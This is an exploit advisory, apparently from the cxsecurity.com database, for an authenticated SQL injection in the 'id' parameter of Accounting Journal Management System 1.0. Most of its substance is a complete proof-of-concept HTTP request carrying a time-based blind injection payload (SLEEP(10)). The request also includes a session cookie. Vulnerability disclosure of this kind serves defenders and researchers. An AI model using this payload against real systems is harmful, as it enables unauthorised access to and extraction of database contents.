Accounting Journal Management System 1.0 SQL Injection

2022.02.13
Credit: Alperen Ergel
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N/A # Date: 09.02.2022 ######## Description ######## # # # Authenticate and get update user settings will be appear the # id paramater put your payload at there it'll be work # # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa Upgrade-Insecure-Requests: 1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top